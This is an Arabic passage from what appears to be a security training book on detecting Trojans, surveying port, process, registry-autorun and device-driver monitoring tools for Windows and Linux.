‫‪ CurrPorts‬ﯾﺳﻣﺢ ﻟك ﺑﻌرض ﻗﺎﺋﻣﺔ اﻟﻣﻧﺎﻓذ اﻟﺗﻲ ھﻲ ﺣﺎﻟﯾﺎ ﻗﯾد اﻻﺳﺗﺧدام واﻟﺗطﺑﯾﻖ اﻟﺗﻲ ﯾﺳﺗﺧدم ھذه اﻟﻣﻧﺎﻓذ‪ .‬ﯾﻣﻛﻧك إﻏﻼق اﻻﺗﺻﺎل اﻟﻣﺣدد‬
‫وأﯾﺿﺎ إﻧﮭﺎء اﻟﻌﻣﻠﯾﺔ اﻟﺗﻲ ﺗﺳﺗﺧدﻣﮭﺎ‪ ،‬وﺗﺻدﯾر اﻟﺟﻣﯾﻊ أو اﻟﻌﻧﺎﺻر اﻟﻣﺣددة إﻟﻰ ‪ HTML‬أو ﻧص ﺗﻘرﯾر‪ .‬ﻓﺈﻧﮫ ﯾﻌرض ﻗﺎﺋﻣﺔ ﺑﺟﻣﯾﻊ ﻣﻧﺎﻓذ‬
‫‪ TCP/IP‬و‪ UDP‬اﻟﻣﻔﺗوﺣﺔ ﺣﺎﻟﯾﺎ ﻋﻠﻰ اﻟﻧظﺎم‪ .‬ﻟﻛل ﻣﻧﻔذ ﻓﻲ اﻟﻘﺎﺋﻣﺔ‪ ،‬ﯾﺗم ﻋرض اﻟﻣﻌﻠوﻣﺎت ﺣول اﻟﻌﻣﻠﯾﺔ اﻟﺗﻲ ﻓﺗﺣت ھذا اﻟﻣﻧﻔذ أﯾﺿﺎ‪ ،‬ﺑﻣﺎ ﻓﻲ‬
‫ذﻟك اﺳم اﻟﻌﻣﻠﯾﺔ‪ ،‬اﻟﻣﺳﺎر اﻟﻛﺎﻣل ﻟﻠﻌﻣﻠﯾﺔ‪ ،‬وﻧﺳﺧﺔ ﻣن ﻣﻌﻠوﻣﺎت اﻟﻌﻣﻠﯾﺔ )اﺳم اﻟﻣﻧﺗﺞ‪ ،‬وﺻف اﻟﻣﻠف‪ ،‬اﻟﺦ(‪ ،‬واﻟوﻗت اﻟذي ﺗم إﻧﺷﺎء اﻟﻌﻣﻠﯾﺔ‪،‬‬
‫واﻟﻣﺳﺗﺧدم اﻟذي أﻧﺷﺄه‪.‬‬
‫ﻓﺈﻧﮫ ﯾﺳﻣﺢ ﻟك ﺑﺈﻏﻼق اﺗﺻﺎﻻت ‪ TCP‬اﻟﻐﯾر ﻣرﻏوب ﻓﯾﮭﺎ‪ ،‬وﻗﺗل اﻟﻌﻣﻠﯾﺎت اﻟﺗﻲ ﻓﺗﺣت ھذه اﻟﻣﻧﺎﻓذ‪ ،‬وﺣﻔظ ﻣﻌﻠوﻣﺎت ﻣﻧﺎﻓذ ‪ TCP/UDP‬إﻟﻰ‬
‫ﻣﻠف ‪ ،HTML‬ﻣﻠف ‪ ،XML‬أو ﻣﻠف ﻧﺻﻲ‪.‬‬

‫‪538‬‬
‫ﻧﻈﺎم اﻟﺘﺸﻐﯿﻞ ﻟﯿﻨﻜﺲ‬

‫ﻧﺟد ان ﻧظﺎم اﻟﺗﺷﻐﯾل ﻟﯾﻧﻛس ﯾوﻓر اﻟﻌدﯾد ﻣن اﻷدوات ﻟﻣراﻗﺑﺔ اﻟﻣﻧﺎﻓذ ﺣﺗﻰ ﯾﺗم اﻟﻛﺷف ﻋن اﻟﻣﻧﺎﻓذ اﻟﻣﺷﺑوھﺔ‪.‬‬
‫‪Top -1‬‬
‫اﻟﺻﯾﻐﺔ اﻟﻌﺎﻣﺔ ]‪[#top‬‬
‫‪Netstat -2‬‬
‫واﻟﻌدﯾد ﻣن اﻷدوات اﻷﺧرى‪.‬‬
‫اﻟﺑﺣث ﻋن اﻟﻌﻣﻠﯾﺎت اﻟﻣﺷﺑوھﺔ )‪(Scanning for Suspicious Processes‬‬
‫ھﻧﺎك اﻟﻌدﯾد ﻣن اﻷﻋراض اﻟﺗﻲ ﯾﻣﻛﻧﮭﺎ أن ﺗﺷﯾر إﻟﻰ أن ﻧظﺎﻣﻧﺎ ﻗد اﺻﯾب ﺑﺎﻟﻌدوى‪ .‬اﻟﻧظﺎم ﻓﺟﺄة ﯾﺻﺑﺢ ﺑطﯾﺋﺎ‪ ،‬وﺗﺻﺑﺢ ﺳرﻋﺔ اﻟﺗﺣﻣﯾل ﺑطﯾﺋﺔ‪،‬‬
‫وﺳرﻋﺔ اﻻﻧﺗرﻧت ﺗﺄﺗﻲ أﯾﺿﺎ ﺗﻘل ﺑﺷﻛل ﻛﺑﯾر‪.‬‬
‫اﻟﻣﮭﺎﺟﻣﯾن ﯾﺳﺗﺧدﻣوا أﺳﺎﻟﯾب ‪ rootkit‬ﻣﻌﯾﻧﺔ ﻹﺧﻔﺎء اﻟﺗروﺟﺎن ﻓﻲ اﻟﻧظﺎم ﺣﯾث ﻻ ﯾﻣﻛن اﻟﻛﺷف ﻋﻧﮫ ﻋﺎدة ﻣن ﻗﺑل ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت‪.‬‬
‫ھذه اﻟﺗروﺟﺎن و‪ worms‬ﻋﺎدة ﻣﺎ ﯾدﺧل ﻓﻲ اﻟﻧظﺎم ﻣن ﺧﻼل اﻟﺻور‪ ،‬ﻣﻠﻔﺎت اﻟﻣوﺳﯾﻘﻰ واﻟﻔﯾدﯾو‪ ،‬اﻟﺦ اﻟﺗﻲ ﯾﺗم ﺗﺣﻣﯾﻠﮭﺎ ﻓﻲ اﻟﻧظﺎم‪ .‬ﻓﻲ اﻟﺑداﯾﺔ‪،‬‬
‫ﯾﺑدو أن ﻛل ﺷﻲء ﺟﯾد‪ ،‬وﻟﻛن ﺑﺑطء ﺗظﮭرھﺎ ﺗﺄﺛﯾرھﺎ ﺑطرق ﻣﺧﺗﻠﻔﺔ‪ .‬ﺑﺎﺳﺗﺧدام أدوات ﻣراﻗﺑﺔ اﻟﻌﻣﻠﯾﺔ‪ ،‬ﯾﻣﻛﻧﻧﺎ ﺑﺳﮭوﻟﺔ اﻛﺗﺷﺎف ﺣﺻﺎن طروادة‬
‫اﻟﺧﻔﻲ‪ ،worms ،‬و‪ .backdoor‬ﯾﻣﻛن اﻟﻛﺷف ﻋن ﺣﺻﺎن طروادة اﻟﻣﺧﻔﻲ وأﻧواع أﺧرى ﻣن ﻧﻘﺎط اﻟﺿﻌف أو اﻟﻔﯾروﺳﺎت ﻋن طرﯾﻖ‬
‫ﻓﺣص اﻟﻌﻣﻠﯾﺎت اﻟﻣﺷﺑوھﺔ‪.‬‬
‫‪Process Monitor‬‬
‫اﻟﻣﺻدر‪http://technet.microsoft.com :‬‬
‫‪ Process Monitor‬ھو أداة رﺻد ﻷﻧظﻣﺔ اﻟﺗﺷﻐﯾل وﯾﻧدوز اﻟذي ﯾظﮭر ﻧظﺎم اﻟﻣﻠﻔﺎت ﻓﻲ اﻟوﻗت اﻟﺣﻘﯾﻘﻲ‪ ،registry ،‬وﻧﺷﺎط‬
‫‪ .process/thread‬ﯾﺗم اﺳﺗﺧداﻣﮫ ﻟﺗﺣﻠﯾل ﺳﻠوك اﻟﺑراﻣﺞ وﺑراﻣﺞ اﻟﺗﺟﺳس اﻟﻣﺷﻛوك ﻓﯾﮭﺎ‪ .‬وﯾﺗﻣﯾز ﺑوﺟود ﻓﻼﺗر ‪non-destructive‬‬
‫و‪ ،rich‬ﺧﺻﺎﺋص ‪ event‬ﺷﺎﻣﻠﺔ ﻣﻌرﻓﺎت ﻣﺛل ‪ session IDs‬وأﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن وﻣﻌﻠوﻣﺎت ﻋن اﻟﻌﻣﻠﯾﺎت اﻟﻣوﺛوق ﺑﮭﺎ‪full thread ،‬‬
‫‪ stacks‬ﻣﻊ اﻟدﻋم اﻟﻣﺗﻛﺎﻣل ﺑﺎﻟرﻣز ﻟﻛل ﻋﻣﻠﯾﺔ‪ ،‬واﻟوﻟﺞ اﻟﻣﺗﻧﺎظر إﻟﻰ اﻟﻣﻠف‪ ،‬اﻟﺦ‪.‬‬

‫‪539‬‬
‫‪What's Running‬‬
‫اﻟﻣﺻدر‪http://www.whatsrunning.net :‬‬
‫‪ What’s running‬ﯾﻣﻧﺣك ﻧظرة ﻣن اﻟداﺧل إﻟﻰ ﻧظﺎم وﯾﻧدوز اﻟﺧﺎص ﺑك‪ ،‬ﻣﺛل ‪ .2000/XP/2003/Vista/Windows7‬وﯾﺳﺗﻛﺷف‬
‫اﻟﻌﻣﻠﯾﺎت‪ ،‬واﻟﺧدﻣﺎت‪ ،‬اﻟوﺣدات‪ ،driver ، IP-connections،‬اﻟﺦ ﻣن ﺧﻼل ﺗطﺑﯾﻖ ﺑﺳﯾط ﻟﻼﺳﺗﻌﻣﺎل‪.‬‬
‫‪ -‬اﻟﻌﻣﻠﯾﺎت)‪ :(process‬ﯾﺗﻔﻘد اﻟﻌﻣﻠﯾﺎت وﯾﻌطﻲ ﺑﯾﺎﻧﺎت اﻻﺳﺗﺧدام وأداء اﻟﻣوارد ﻣﺛل اﺳﺗﺧدام اﻟذاﻛرة‪ ،‬اﺳﺗﺧدام اﻟﻣﻌﺎﻟﺞ‪ ،‬و‪ .socket‬أﻧﮫ‬
‫ﯾﻌطﻲ ﻛل اﻟﺗﻔﺎﺻﯾل ﻋن ‪ dll‬اﻟﺗﻲ ﯾﺗم ﺗﺣﻣﯾﻠﮭﺎ‪ ،‬واﻟﺧدﻣﺎت اﻟﺗﻲ ﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ داﺧل ھذه اﻟﻌﻣﻠﯾﺔ‪ ،‬واﺗﺻﺎﻻت ‪ IP‬ﻟﻛل ﻋﻣﻠﯾﺔ‪.‬‬
‫‪ -‬اﺗﺻﺎﻻت ‪: (IP connection) IP‬ﻓﮭو ﯾوﻓر ﻛﺎﻓﺔ اﺗﺻﺎﻻت ‪ IP‬اﻟﻧﺷطﺔ ﻓﻲ اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪.‬‬
‫‪ -‬اﻟﺧدﻣﺎت)‪ :(service‬ﯾﺗﻔﻘد اﻟﺧدﻣﺎت اﻟﺗﻲ ﺗﻌﻣل واﻟﻣﺗوﻗﻔﺔ‪.‬‬
‫‪ -‬اﻟوﺣدات)‪ :(module‬ﯾﻛﺗﺷف ﻣﻌﻠوﻣﺎت ﺣول ﻛﺎﻓﺔ ‪ dll:s‬و‪ exe:s‬اﻟﺗﻲ ھﻲ ﻗﯾد اﻻﺳﺗﺧدام ﻋﻠﻰ اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪.‬‬
‫‪ -‬ﺑراﻣﺞ اﻟﺗﺷﻐﯾل)‪ :(driver‬ﯾﻛﺷف اﻟﻣﻌﻠوﻣﺎت ﺣول ﺟﻣﯾﻊ ‪ ،drivers‬ﻟﺗﺷﻐﯾل ‪ driver‬ﯾﻣﻛﻧك ﺗﻔﻘد إﺻدار اﻟﻣﻠف ﻣن أﺟل اﻟﻌﺛور‬
‫ﻋﻠﻰ ﻣورد ھذا ‪.drive‬‬
‫‪ -‬ﻣﻌﻠوﻣﺎت اﻟﻧظﺎم )‪ :(System information‬ﯾظﮭر ﻣﻌﻠوﻣﺗﺎ اﻟﻧظﺎم اﻟﺣﺎﺳﻣﺔ ﺣول اﻟﻧظﺎم اﻟﺧﺎص ﺑك ﻣﺛل اﻟذاﻛرة اﻟﻣﺛﺑﺗﺔ‪ ،‬واﻟﻣﻌﺎﻟﺞ‪،‬‬
‫اﻷﻋﺿﺎء اﻟﻣﺳﺟﻠﯾن‪ ،‬وﻧظﺎم اﻟﺗﺷﻐﯾل وﻧﺳﺧﺗﮫ‪.‬‬
‫‪Autorun‬‬
‫اﻟﻣﺻدر‪http://technet.microsoft.com/en-US :‬‬
‫ھذه اﻷداة اﻟﻣﺳﺎﻋدة‪ ،‬واﻟﺗﻲ ﻟدﯾﮫ اﻟﻣﻌرﻓﺔ اﻷﻛﺛر ﺷﻣوﻻ ﻋن ﻣواﻗﻊ اﻷﺟﮭزة اﻟﺗﻲ ﺗﻌﻣل ﻋﻧد ﺑدء ﺗﺷﻐﯾل اﻟﻧظﺎم‪ ،‬ﯾظﮭر ﻟك ﻣﺎ ﯾﻘوم ﺑﮫ اﻟﺑراﻣﺞ ﻣن‬
‫اﻋداد ﺛﻧﺎء ﻋﻣﻠﯾﺔ ﺗﻣﮭﯾد اﻟﻧظﺎم أو اﻟدﺧول‪ ،‬وﯾظﮭر ﻟك اﻹدﺧﺎﻻت ﻓﻲ ﻧظﺎم وﯾﻧدوز‪ .‬ﯾﻣﻛﻧك إﻋداد ‪ Autorun‬ﻹظﮭﺎر اﻟﻣواﻗﻊ اﻷﺧرى‪.‬‬
‫‪ -‬ﺗﺑدأ اﻟﻌﻣل ﻋن طرﯾﻖ اﻟﻧﻘر اﻟﻣزدوج ﺑﺎﻟﻣﺎوس ﻋﻠﻰ ‪.Autorun.exe‬‬
‫‪ -‬ھذه اﻷداة ﺗﻘوم ﺑﻌرض ﻗﺎﺋﻣﮫ ﻟﺟﻣﯾﻊ اﻟﻌﻣﻠﯾﺎت واﻟﺧدﻣﺎت و‪.DLL‬‬
‫‪ -‬ﺑﻌد اﻟﻧﻘر ﻋﻠﻰ ‪ Autorun.exe‬ﺗظﮭر اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪540‬‬
‫‪ -‬ﻧﺟد ان ﺷرﯾط اﻷدوات اﻟﻌﻠوي ﯾﺗﻛون ﻣن اﻟﻌدﯾد ﻣن اﻟﺧﯾﺎرات اﻟﺗﻲ ﺗﺗﯾﺢ ﻟك ﻓﺣص اﻟﻧظﺎم‪.‬‬
‫)‪) PrcView (Process Viewer‬اھﻢ واﺣﺪ(‬
‫)‪ PrcView (Process Viewer‬ﯾظﮭر ﻟك ﺟﻣﯾﻊ اﻟﺑراﻣﺞ أو اﻟﺧدﻣﺎت ﻗﯾد اﻟﺗﺷﻐﯾل ﺣﺎﻟﯾﺎ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك‪ ،‬وﺑذﻟك ﯾﺳﺎﻋد‬
‫ﻋﻠﻰ ﺿﻣﺎن ﻋدم إﺻﺎﺑﺔ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك ﺑﺎﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ‪ .‬ﻓﺈﻧﮫ ﯾظﮭر ﻟك ﻗﺎﺋﻣﺔ ﺑﺳﯾطﺔ ﻟﻘراءة ‪-‬ﺟﻣﯾﻊ اﻟﺑراﻣﺞ واﻟﺧدﻣﺎت‪ ،‬وﯾوﻓر‬
‫ﺛروة ﻣن اﻟﺗﻔﺎﺻﯾل ﺣول ﻛل ﻣﻧﮭﺎ‪ .‬ﻓﺈﻧﮫ ﯾظﮭر اﺳم اﻟﻣﻠف‪ ،‬ﻣﺳﺎر اﻟﻣﻠف‪ ،‬وﻣﻘدار اﻟذاﻛرة وﺣدة اﻟﻣﻌﺎﻟﺟﺔ اﻟﻣرﻛزﯾﺔ ﻟﻛل اﻻﺳﺗﺧداﻣﺎت‪ .‬ﻟﻣزﯾد ﻣن‬
‫اﻟﺗﻔﺎﺻﯾل‪ ،‬اﻧﻘر ﻧﻘرا ﻣزدوﺟﺎ ﻓوق أي ﻗﺎﺋﻣﺔ‪ ،‬وﺳﺗﺣﺻل ﻋﻠﻰ اﻟﻣزﯾد ﻣن اﻟﻣﻌﻠوﻣﺎت‪ ،‬ﺑﻣﺎ ﻓﻲ ذﻟك اﻻﺳم اﻟﻛﺎﻣل اﻟﺑرﻧﺎﻣﺞ‪ ،‬ﻧﺎﺷر ﻟﮭﺎ‪ ،‬وإﺻدار‬
‫اﻟﻣﻠف‪ ،‬وأﻛﺛر ﻣن ذﻟك ﺑﻛﺛﯾر‪.‬‬
‫ﯾﻣﻛﻧك أﯾﺿﺎ ﻗﺗل أي ﻣن اﻟﺑراﻣﺞ اﻟﺗﻲ ﻗد ﺗﻛون ﺧطرة‪ ،‬أو أي ﻣﻧﮭﺎ ﻗد ﺗﺗﺳﺑب ﻓﻲ ﺗﻌﺛر اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪ .‬ﺑﺎﻟﻣﻧﺎﺳﺑﺔ‪ ،‬وﯾﻧﻘب ﻋﻣﯾﻘﺎ ﻟﻠﻐﺎﯾﺔ ﻓﻲ‬
‫اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪ ،‬وﺣﺗﻰ ﯾﻌرض ﻣﺎ ھﻲ‪.‬‬
‫اﻟﻠﯿﻨﻜﺲ‬
‫ﻧﺟد ان ﻧظﺎم اﻟﺗﺷﻐﯾل ﯾوﻓر ﻟﻧﺎ أﯾﺿﺎ اﻟﻌدﯾد ﻣن اﻷدوات وﻣن أھﻣﮭﺎ اﻷداة ‪ top‬واﻷداة ‪.ps‬‬
‫اﻷدوات اﻷﺧﺮى ﻟﺮﺻﺪ اﻟﻌﻤﻠﯿﺎت )‪(Process Monitoring Tools‬‬
‫ھﻧﺎك اﻟﻌدﯾد ﻣن اﻷدوات اﻻﺧرى ﻟرﺻد اﻟﻌﻣﻠﯾﺔ اﻟﺗﻲ ﯾﻣﻛﻧك اﺳﺗﺧداﻣﮭﺎ ﻟﻠﻛﺷف ﻋن اﻟﺗروﺟﺎن اﻟﻣﺛﺑﺗﺔ ﻋﻠﻰ اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪ .‬ھذه اﻷدوات‬
‫ﺗﻘوم ﺑﻌرض ﻗﺎﺋﻣﺔ ﺑﺟﻣﯾﻊ اﻟﻌﻣﻠﯾﺎت ﻗﯾد اﻟﺗﺷﻐﯾل أو اﻟﻣﺛﺑﺗﺔ ﻋﻠﻰ اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪ .‬ﻣن ﺧﻼل ﺗﺣﻠﯾل ھذه اﻟﻘﺎﺋﻣﺔ ﯾﻣﻛﻧك ﺗﺣدﯾد اﻟﺗروﺟﺎن‪ .‬ﺗوﻓر‬
‫ھذه اﻷدوات وﺣدة رﺻد ﺷﺎﻣل ﻟﻛﺎﻣل اﻟﺷﺑﻛﺔ اﻟﺧﺎﺻﺔ ﺑك واﻟﺑﻧﯾﺔ اﻟﺗﺣﺗﯾﺔ ﻟﺗﻛﻧوﻟوﺟﯾﺎ اﻟﻣﻌﻠوﻣﺎت‪ .‬ﻓﮭﻲ ﺗﻘوم ﺑﺎﺳﺗﻣرار وﺑﺷﻛل اﺳﺗﺑﺎﻗﻲ ﺑﻣراﻗﺑﺔ‬
‫ﻧظﺎم ﺗﻛﻧوﻟوﺟﯾﺎ اﻟﻣﻌﻠوﻣﺎت ﺑﺄﻛﻣﻠﮭﺎ ﺑﺳﺑب اﻧﻘطﺎع أو اﻧﺧﻔﺎض أي ﻣن اﻷداء ﯾﻣﻛن ﺗﺣدﯾدھﺎ ﻋﻠﻰ اﻟﻔور وإﺧطﺎرﻧﺎ‪ .‬ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ذﻟك‪ ،‬ﻓﺈﻧﮫ ﯾﻘﺗل‬
‫ﻛل اﻟﺑراﻣﺞ اﻟﺗﻲ ﺗﻛون ذات ﺗﮭدﯾد ﻟﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك‪ ،‬ﺣﺗﻰ ﻟو ﻛﺎن ﻣﺧﻔﯾﺎ‪ .‬وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض أدوات رﺻد اﻟﻌﻣﻠﯾﺎت ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬

541
Winsonar available at http://www.softpedia.com/get/System/System-Info/Winsonar.shtml

HiddenFinder available at http://download.cnet.com/HiddenFinder/3000-2239_4-10448986.html
KillProcess available at http://orangelampsoftware.com
Security Task Manager available at http://www.neuber.com
Yet Another (remote) Process Monitor available at http://yaprocmon.sourceforge.net
MONIT available at http://mmonit.com
Process Monitor available at http://technet.microsoft.com
OpManager available at http://www.manageengine.com
(Scanning for Suspicious Registry Entries) ‫ اﻟﻣﺷﺑوھﺔ‬Registry ‫اﻟﺑﺣث ﻋن إدﺧﺎﻻت‬
‫ ﯾﻣﻛﻧك أن ﺗﻼﺣظ اﻟﺗﻐﯾرات اﻟﻣﺧﺗﻠﻔﺔ؛‬.registry ‫ ﻓﺈﻧﮫ ﯾﻧﺷﺊ إدﺧﺎﻻت ﻋﻠﻰ ﻣﻠف‬،‫ﻋﻧدﻣﺎ ﯾﺗم ﺗﺛﺑﯾت ﺣﺻﺎن طروادة ﻋﻠﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ‬
‫ ﻣن اﺟل‬registry ‫ ﺳوف ﺗﺣﺗﺎج اﻟﻰ ﻓﺣص‬،‫ ﻟذﻟك‬.‫ اﻟﻌدﯾد ﻣن اﻻﻋﻼﻧﺎت اﻟﻣﺧﺗﻠﻔﺔ ﺗظﮭر ﺑﻛﺛره‬.‫اﻷﻋراض اﻷوﻟﻰ ھو أن اﻟﻧظﺎم ﯾﺻﺑﺢ ﺑطﻲء‬
:registry ‫ اﻟوﯾﻧدوز ﯾﻧﻔذ ﺗﻠﻘﺎﺋﯾﺎ اﻹرﺷﺎدات ﻓﻲ اﻟﻣﻘطﻊ اﻟﺗﺎﻟﻲ ﻣن‬.‫ﻣﻼﺣظﮫ اﻻدﺧﺎﻻت اﻟﻣﺷﺑوھﺔ واﻟﺗﻲ ﺗﺳﺎﻋد ﻓﻲ اﻟﻛﺷف ﻋن ﺣﺻﺎن طروادة‬
- Run
- RunServices
- RunOnce
- RunServicesOnce
- HKEY_CLASSES_ROOT\exefile\shell\open\command “%1” %*
‫ اﻟﺗروﺟﺎن ﯾدرج اﻟﺗﻌﻠﯾﻣﺎت ﻓﻲ ھذه اﻟﻣﻘﺎطﻊ‬.‫ ﻟﻺدﺧﺎﻻت اﻟﻣﺷﺑوھﺔ ﻣن اﻟﻣﻣﻛن ان ﺗﻛﺷف ﻋن اﻟﻌدوى ﺑواﺳطﺔ اﻟﺗروﺟﺎن‬registry ‫ﻓﺣص ﻗﯾم‬
.‫ ﻷداء أﻧﺷطﺗﮫ اﻟﺧﺑﯾﺛﺔ‬registry ‫ﻣن‬
jvl6 PowerTools 2014 -Registry Cleaner

http://ww.macecraft.com :‫اﻟﻣﺻدر‬
‫ واﻟﻐﯾر اﻟﺿرورﯾﺔ ﻓﻲ ﻣﻠف‬registry ‫ واﻟذى ﯾﺳﺗﺧدم ﻟﻠﻌﺛور ﻋﻠﻰ أﺧطﺎء‬registry cleaner ‫ ھو‬jv16 PowerTools 2014
‫ ﯾﻣﻛﻧﮫ اﺳﺗﺧداﻣﮫ أﯾﺿﺎ ﻓﻲ ﺗﺣﺳﯾن أداء‬.‫ اﻟﺗﻲ ﺗم إﻧﺷﺎؤھﺎ ﺑواﺳطﺔ أﺣﺻﻧﺔ طروادة‬registry ‫ وﯾﺳﺎﻋد ﻓﻲ اﻟﻛﺷف ﻋن إدﺧﺎﻻت‬registry
.‫ وﯾﺣﺳن اﻷﻣﺎن واﻟﺧﺻوﺻﯾﺔ‬MRU‫ و‬history ‫ ﺗﻧظﯾف ﺑﯾﺎﻧﺎت ﻛل ﻣن‬،‫ اﺳﺗرﺟﺎع أي ﻣن اﻟﻣﻠﻔﺎت اﻟﻣﺣذوﻓﺔ ﺑطرﯾﻘﺔ اﻟﺧطﺄ‬،‫اﻟوﯾﻧدوز‬

‫‪542‬‬
‫‪Registry Entry Monitoring Tool: PC Tools Registry‬‬

‫اﻟﻣﺻدر‪http://www.pctools.com :‬‬
‫‪ PC Tools Registry Mechanic‬ھو ‪ registry cleaner‬ﻣﺗﻘدم اﻟﺗﻲ ﺗﻔﺣص ﻗﯾم ‪registry‬ﻟﻺدﺧﺎﻻت اﻟﻣﺷﺑوھﺔ اﻟﺗﻲ أﻧﺷﺄﺗﮭﺎ ﻋدوى‬
‫اﻟﺗروﺟﺎن‪ .‬ھذا اﻟﺗطﺑﯾﻖ ﯾﻘوم ﺑﺈﺻﻼح أﺧطﺎء اﻟوﯾﻧدوز وﯾﺣﺳن ﺳرﻋﺔ اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪ ،‬وزﯾﺎدة أداء اﻟﺑراﻣﺞ‪ .‬ﻓﺈﻧﮫ ﯾﻧظف اﻟﻧظﺎم اﻟﺧﺎص ﺑك‬
‫وﯾؤﻣن اﻟﺧﺻوﺻﯾﺔ اﻟﺷﺧﺻﯾﺔ‪ .‬ﻓﺈﻧﮫ ﯾﺣﻔظ ﻛل ﻣﺎ ﺗﺑذﻟوﻧﮫ ﻋﻠﻰ اﻹﻧﺗرﻧت وأﻧﺷطﺔ اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك وﯾﻣﺣو اﻟﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎﺳﺔ ﺑﺷﻛل داﺋم‪.‬‬
‫‪Registry Entry Monitoring Tools‬‬

‫ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ‪ jv16 PowerTools 2014-Registry Cleaner‬و‪ ،PC Tools Registry Mechanic‬ﻓﮭﻧﺎك اﻟﻌدﯾد ﻣن اﻷدوات‬
‫اﻷﺧرى اﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﻟﻣراﻗﺑﺔ إدﺧﺎﻻت‪ ،Registry‬وﺑﺎﻟﺗﺎﻟﻲ ﺗﺳﺎﻋد ﻓﻲ اﻟﻛﺷف ﻋن ﺗﺛﺑﯾت ﺣﺻﺎن طروادة‪ ،‬إن وﺟدت‪ .‬وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﻣن‬
‫أدوات اﻟرﺻد إدﺧﺎل ‪Registry‬اﻟﺗﻲ ﯾﺗم اﺳﺗﺧداﻣﮭﺎ ﺑﺷﻛل رﺋﯾﺳﻲ ﻟﻐرض ﺗﻧظﯾف ‪Registry‬ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬
‫‪Reg Organizer available at http://www.chemtable.com‬‬
‫‪Registry Shower available at http://www.registryshower.com‬‬
‫‪Comodo Cloud Scanner available at http://www.comodo.com‬‬
‫‪Buster Sandbox Analyzer available at http://bsa.isoftware.nl‬‬
‫‪All-Seeing Eyes available at http://www.fortego.com‬‬
‫‪MJ Registry Watcher available at http://www.jacobsm.com‬‬
‫‪Active Registry Monitor available at http://www.devicelock.com‬‬
‫‪Regshot available at http://regshot.sourceforge.net‬‬
‫‪Registry Live Watch available at http://leelusoft.blogspot.in‬‬
‫‪Scanning For Suspicious Device Drivers‬‬
‫ﻋﻧدﻣﺎ ﯾﺗم ﺗﺣﻣﯾل ﺑراﻣﺞ ﺗﺷﻐﯾل اﻷﺟﮭزة )‪ (device drivers‬ﻣن ﻣﺧﺗﻠف اﻟﻣﺻﺎدر اﻟﺗﻲ ﻟﯾﺳت ﺟدﯾرة ﺑﺎﻟﺛﻘﺔ ﻓﺎن اﻟﺗروﺟﺎن ﯾﻣﻛﻧﮫ أﯾﺿﺎ‬
‫اﻟﺣﺻول ﻋﻠﻰ ﺗﺛﺑﯾت ﻋﻠﻰ اﻟﻧظﺎم‪ .‬ﺣﯾث ﯾﺳﺗﺧدم أﺣﺻﻧﺔ طروادة ھذه اﻷﺟﮭزة ﻛﻐطﺎء ﻹﺧﻔﺎﺋﮫ وﻟﻛن ﺑﺎﺳﺗﺧدام أدوات رﺻد ﺗﺷﻐﯾل اﻟﺟﮭﺎز‪،‬‬
‫ﯾﻣﻛﻧﻧﺎ ﺗﺣدﯾد إذا ﻛﺎن ھﻧﺎك أي ﺣﺿور ﻟطروادة‪ .‬ﯾﺗم ﺗﺛﺑﯾت أﺣﺻﻧﺔ طروادة ﺟﻧﺑﺎ إﻟﻰ ﺟﻧب ﻣﻊ ﺑراﻣﺞ ﺗﺷﻐﯾل اﻷﺟﮭزة اﻟﺗﻲ ﺗم ﺗﺣﻣﯾﻠﮭﺎ ﻣن‬
‫ﻣﺻﺎدر ﻏﯾر ﻣوﺛوق ﺑﮭﺎ واﺳﺗﺧدام ﺑراﻣﺞ اﻟﺗﺷﻐﯾل ھذه ﻛدرع ﻟﺗﺟﻧب اﻟﻛﺷف‪ .‬ﻟذﻟك ﯾﺟب ﻓﺣص ﺑراﻣﺞ ﺗﺷﻐﯾل اﻷﺟﮭزة اﻟﻣﺷﺑوھﺔ واﻟﺗﺣﻘﻖ ﻣﻣﺎ‬
‫إذا ﻛﺎﻧت ﺣﻘﯾﻘﯾﺔ وﺗﺣﻣﯾﻠﮭﺎ ﻣن اﻟﻣوﻗﻊ اﻟﻧﺎﺷر اﻷﺻﻠﻲ‪.‬‬

‫‪543‬‬
‫‪Device Drivers Monitoring Tool: DriverView‬‬

‫اﻟﻣﺻدر‪http://www.nirsoft.net :‬‬
‫اﻷداة ‪DriverView‬ﺗﻌرض ﻗﺎﺋﻣﮫ ﻛﺎﻣﻠﮫ ﺑﺑراﻣﺞ ﺗﺷﻐﯾل اﻷﺟﮭزة اﻟﺗﻲ ﺗم ﺗﺣﻣﯾﻠﮭﺎ ﺣﺎﻟﯾﺎ ﻓﻲ اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪ .‬ﯾﺗم ﻋرض ﻣﻌﻠوﻣﺎت إﺿﺎﻓﯾﺔ‬
